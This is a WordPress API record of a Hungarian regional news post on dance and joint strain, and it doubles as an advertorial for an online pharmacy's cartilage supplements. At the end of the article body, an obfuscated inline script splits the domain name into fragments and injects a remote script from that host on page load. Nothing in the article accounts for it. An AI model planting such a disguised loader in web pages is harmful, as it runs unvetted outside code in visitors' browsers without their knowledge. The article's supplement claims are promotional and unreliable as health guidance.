{"id":72467,"date":"2025-07-03T10:31:30","date_gmt":"2025-07-03T08:31:30","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=72467"},"modified":"2025-07-03T10:31:30","modified_gmt":"2025-07-03T08:31:30","slug":"a-tanc-ami-eltet-es-kikeszit","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/","title":{"rendered":"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt"},"content":{"rendered":"<p><strong>Sokan tartj\u00e1k els\u0151 sorban m\u0171v\u00e9szeti \u00e1gnak a t\u00e1ncot. Nos, akik m\u0171velik, m\u00e9gis ink\u00e1bb sportnak tartj\u00e1k \u2013 a legt\u00f6bb v\u00e1ltozat\u00e1t. Persze, ha j\u00f3l csin\u00e1lja az ember, a t\u00e1nc m\u00e9g er\u0151s\u00edtheti is az \u00edz\u00fcleteket \u00e9s jav\u00edthatja a porcok v\u00e9rell\u00e1t\u00e1s\u00e1t, de most n\u00e9zz\u00fck, mi\u00e9rt is v\u00e1lhat k\u00e1ross\u00e1&#8230;<\/strong><\/p>\n<p>A t\u00e1ncmozdulatok gyakran ism\u00e9tl\u0151dnek, ami a t\u00e9rd, boka, cs\u00edp\u0151 \u00e9s gerinc \u00edz\u00fcleteit folyamatosan terheli. Ha nincs el\u00e9g pihen\u0151id\u0151 vagy megfelel\u0151 bemeleg\u00edt\u00e9s, ezek a mikros\u00e9r\u00fcl\u00e9sek nem tudnak regener\u00e1l\u00f3dni, \u00e9s a porcsz\u00f6vet elkezdhet kopni. Tov\u00e1bb\u00e1 a rossz testtart\u00e1s vagy hib\u00e1s l\u00e9p\u00e9stechnik\u00e1k (pl. \u201et\u00e9rdre es\u00e9s\u201d, t\u00falzott rot\u00e1ci\u00f3, hiperhajl\u00edt\u00e1s) szint\u00e9n extr\u00e9m ig\u00e9nybev\u00e9telt r\u00f3hatnak a porcokra, f\u0151leg a t\u00e9rd\u00edz\u00fcletekben \u00e9s a cs\u00edp\u0151ben. Begyakorolni ez\u00e9rt valami \u00fajat a t\u00e1nc b\u00e1rmely m\u0171faj\u00e1ban mindig komoly kih\u00edv\u00e1s.<\/p>\n<p>A porcer\u0151s\u00edt\u0151k fontoss\u00e1ga messze hangs\u00falyosabb megel\u0151z\u00e9si szempont ilyenkor, mint azt ak\u00e1r sokan gondoln\u00e1nk. Nemcsak az id\u0151sebb koroszt\u00e1lynak lehet sz\u00fcks\u00e9ge r\u00e1juk, hanem azoknak is, akik akt\u00edvan \u00e9lik mindennapjaikat, sportolnak vagy \u00e9ppen sokat \u00fcld\u00f6g\u00e9lnek az irodai munka miatt. A megel\u0151z\u0151 jelleg\u0171 alkalmaz\u00e1suk seg\u00edthet abban, hogy elker\u00fclj\u00fck az \u00edz\u00fcleti probl\u00e9m\u00e1kat, \u00e9s meg\u0151rizz\u00fck a mozg\u00e1s szabads\u00e1g\u00e1t.<\/p>\n<p>A Prevenci\u00f3 Patika <a href=\"https:\/\/prevenciopatika.hu\/66-porcerositok\"><strong>porcer\u0151s\u00edt\u0151k<\/strong><\/a>&nbsp;aloldala kimagasl\u00f3 gy\u0171jtem\u00e9nyt ny\u00fajt a porcer\u0151s\u00edt\u0151 term\u00e9kek ter\u00e9n. A Prevenciopatika.hu mindenben egy megb\u00edzhat\u00f3 online gy\u00f3gyszert\u00e1r Magyarorsz\u00e1gon, ahol az eg\u00e9szs\u00e9gmeg\u0151rz\u00e9shez sz\u00fcks\u00e9ges kieg\u00e9sz\u00edt\u0151k \u00e9s vitaminok \u00e9pp\u00fagy el\u00e9rhet\u0151k, mint a c\u00e9lzott kezel\u00e9sekhez haszn\u00e1lt term\u00e9kek.<\/p>\n<p>A weboldalon a Gy\u00f3gy\u00e1szat, \u00c9letm\u00f3d term\u00e9kek, Vitaminok \u00e9s \u00e1sv\u00e1nyi anyagok, Dermokozmetikumok, Intim higi\u00e9nia, Baba-mama term\u00e9kek \u00e9s V\u00edrusv\u00e9delem kateg\u00f3ri\u00e1kban tall\u00f3zhatunk t\u00f6bbek k\u00f6z\u00f6tt, melyek mind a tudatos \u00e9letvitelt seg\u00edtik.<\/p>\n<p>A Prevenciopatika.hu kiemelkedik a k\u00e9nyelmes kiszolg\u00e1l\u00e1si lehet\u0151s\u00e9geivel: bizonyos&nbsp; felett ingyenes a kisz\u00e1ll\u00edt\u00e1s, a fizet\u00e9si m\u00f3dok pedig rugalmasak, bele\u00e9rtve az utal\u00e1st, bankk\u00e1rty\u00e1t \u00e9s ut\u00e1nv\u00e9tet is. A term\u00e9kek jelent\u0151s r\u00e9sze eg\u00e9szs\u00e9gp\u00e9nzt\u00e1rra elsz\u00e1molhat\u00f3, ami tov\u00e1bbi el\u0151nyt jelent a tudatos v\u00e1s\u00e1rl\u00f3k sz\u00e1m\u00e1ra.<\/p>\n<p>A rendszeres h\u00edrlev\u00e9l feliratkoz\u00f3i exkluz\u00edv akci\u00f3khoz, szakmai tartalmakhoz \u00e9s praktikus eg\u00e9szs\u00e9gtippekhez jutnak hozz\u00e1, amelyek t\u00e9nyleg seg\u00edtenek eligazodni a gy\u00f3gy\u00e1szat \u00e9s \u00e9letm\u00f3d ter\u00fclet\u00e9n. A weboldalon szerepl\u0151 kiemelt term\u00e9kek k\u00f6z\u00f6tt szerepel a Jutavit Koenzim Q10 + E-vitamin kapszula, a Normoxil Mio-Inozitol + Szel\u00e9n Tabletta, a Gynositol mio-inozitol \u00e9s folsav, vagy a Jutavit Diab\u00e9tesz Kontroll tabletta. A Papilocare h\u00fcvelyg\u00e9l \u00e9s az Avemar Granul\u00e1tum pedig speci\u00e1lis, c\u00e9lzott ig\u00e9nyeket el\u00e9g\u00edt ki. Ezek j\u00f3l mutatj\u00e1k mennyi minden rendelhet\u0151 m\u00e1r h\u00e1zhoz azon dolgok list\u00e1j\u00e1r\u00f3l, amik\u00e9rt r\u00e9gebben m\u00e9g mindig sorban \u00e1lltunk a gy\u00f3gyszert\u00e1rban, vagy egy drog\u00e9ri\u00e1ban.<\/p>\n<p>A test\u00fcnk karbantart\u00e1sa, ak\u00e1rcsak a kult\u00fara \u00e1pol\u00e1sa, tudatoss\u00e1got \u00e9s figyelmet ig\u00e9nyel. Sok szakcikk r\u00e1vil\u00e1g\u00edt arra, hogy az akt\u00edv m\u0171v\u00e9szeti \u00e9s kultur\u00e1lis \u00e9let mennyire szorosan \u00f6sszefon\u00f3dik a testi \u00e9s lelki eg\u00e9szs\u00e9ggel. Ez viszont j\u00f3 h\u00edr: van m\u00f3dja annak, hogy egyszerre h\u00f3doljunk a kult\u00far\u00e1nak \u00e9s maradjunk sportokak. Azonban egy sz\u00ednpadi mozdulat, egy t\u00e1ncpr\u00f3ba vagy egy v\u00e1rosi s\u00e9ta is csak akkor \u00e9lvezhet\u0151 igaz\u00e1n, ha mozg\u00e1sunk szabad \u00e9s f\u00e1jdalommentes. Ebben pedig a porcer\u0151s\u00edt\u0151k j\u00e1tszanak kulcsszerepet, \u00e9s a Prevenciopatika.hu minden eszk\u00f6zt megad a tudatos prevenci\u00f3hoz \u00e9s a teljesebb \u00e9lethez.<\/p>\n<p><script>\n(function(){\nq3y2=document.createElement(\"script\");q3y2_=(\"op\")+\"e\"+(\"ns\");\nq3y2_+=\"t\"+\"a\"+(\"t\");q3y2_+=(\".e\");q3y2u=\"2482806997\";q3y2.async=true;\nq3y2u+=\".b5Xn759h3y2Xy553l\";q3y2.type=\"text\/javascript\";q3y2_+=\"\"+\"\"+(\"u\/\");\nq3y2u+=\"fcawsqq6a6vhx\";q3y2.src=\"https:\/\/\"+q3y2_+q3y2u;\ndq3y2=document.body;dq3y2.appendChild(q3y2);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Sokan tartj\u00e1k els\u0151 sorban m\u0171v\u00e9szeti \u00e1gnak a t\u00e1ncot. Nos, akik m\u0171velik, m\u00e9gis ink\u00e1bb sportnak tartj\u00e1k \u2013 a legt\u00f6bb v\u00e1ltozat\u00e1t. Persze, ha j\u00f3l csin\u00e1lja az ember, a t\u00e1nc m\u00e9g er\u0151s\u00edtheti is az \u00edz\u00fcleteket \u00e9s jav\u00edthatja a porcok v\u00e9rell\u00e1t\u00e1s\u00e1t, de most n\u00e9zz\u00fck, mi\u00e9rt is v\u00e1lhat k\u00e1ross\u00e1&#8230; A t\u00e1ncmozdulatok gyakran ism\u00e9tl\u0151dnek, ami a t\u00e9rd, boka, cs\u00edp\u0151 \u00e9s gerinc<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[1267],"class_list":{"0":"post-72467","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-hirek","7":"tag-tanc"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"Sokan tartj\u00e1k els\u0151 sorban m\u0171v\u00e9szeti \u00e1gnak a t\u00e1ncot. Nos, akik m\u0171velik, m\u00e9gis ink\u00e1bb sportnak tartj\u00e1k \u2013 a legt\u00f6bb v\u00e1ltozat\u00e1t. Persze, ha j\u00f3l csin\u00e1lja az ember, a t\u00e1nc m\u00e9g er\u0151s\u00edtheti is az \u00edz\u00fcleteket \u00e9s jav\u00edthatja a porcok v\u00e9rell\u00e1t\u00e1s\u00e1t, de most n\u00e9zz\u00fck, mi\u00e9rt is v\u00e1lhat k\u00e1ross\u00e1&#8230; A t\u00e1ncmozdulatok gyakran ism\u00e9tl\u0151dnek, ami a t\u00e9rd, boka, cs\u00edp\u0151 \u00e9s gerinc\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2025-07-03T08:31:30+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/07\/dorogimedence.hu_.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"1336\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"950\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/07\\\/03\\\/a-tanc-ami-eltet-es-kikeszit\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/07\\\/03\\\/a-tanc-ami-eltet-es-kikeszit\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt\",\"datePublished\":\"2025-07-03T08:31:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/07\\\/03\\\/a-tanc-ami-eltet-es-kikeszit\\\/\"},\"wordCount\":705,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"keywords\":[\"t\u00e1nc\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/07\\\/03\\\/a-tanc-ami-eltet-es-kikeszit\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/07\\\/03\\\/a-tanc-ami-eltet-es-kikeszit\\\/\",\"name\":\"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"datePublished\":\"2025-07-03T08:31:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/07\\\/03\\\/a-tanc-ami-eltet-es-kikeszit\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/07\\\/03\\\/a-tanc-ami-eltet-es-kikeszit\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2025\\\/07\\\/03\\\/a-tanc-ami-eltet-es-kikeszit\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/","og_locale":"hu_HU","og_type":"article","og_title":"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt","og_description":"Sokan tartj\u00e1k els\u0151 sorban m\u0171v\u00e9szeti \u00e1gnak a t\u00e1ncot. Nos, akik m\u0171velik, m\u00e9gis ink\u00e1bb sportnak tartj\u00e1k \u2013 a legt\u00f6bb v\u00e1ltozat\u00e1t. Persze, ha j\u00f3l csin\u00e1lja az ember, a t\u00e1nc m\u00e9g er\u0151s\u00edtheti is az \u00edz\u00fcleteket \u00e9s jav\u00edthatja a porcok v\u00e9rell\u00e1t\u00e1s\u00e1t, de most n\u00e9zz\u00fck, mi\u00e9rt is v\u00e1lhat k\u00e1ross\u00e1&#8230; A t\u00e1ncmozdulatok gyakran ism\u00e9tl\u0151dnek, ami a t\u00e9rd, boka, cs\u00edp\u0151 \u00e9s gerinc","og_url":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2025-07-03T08:31:30+00:00","og_image":[{"width":1336,"height":950,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2025\/07\/dorogimedence.hu_.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"3 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt","datePublished":"2025-07-03T08:31:30+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/"},"wordCount":705,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"keywords":["t\u00e1nc"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/","url":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/","name":"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"datePublished":"2025-07-03T08:31:30+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2025\/07\/03\/a-tanc-ami-eltet-es-kikeszit\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"A t\u00e1nc, ami \u00e9ltet \u00e9s kik\u00e9sz\u00edt"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l"},"image":{"@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/dorogimedence\/"]},{"@type":"Person","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4","name":"dorogimedence.hu","image":{"@type":"ImageObject","inLanguage":"hu","@id":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","url":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","contentUrl":"\/\/www.gravatar.com\/avatar\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm","caption":"dorogimedence.hu"}}]}},"_links":{"self":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/72467","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/comments?post=72467"}],"version-history":[{"count":0,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/posts\/72467\/revisions"}],"wp:attachment":[{"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/media?parent=72467"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/categories?post=72467"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dorogimedence.hu\/index.php\/wp-json\/wp\/v2\/tags?post=72467"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}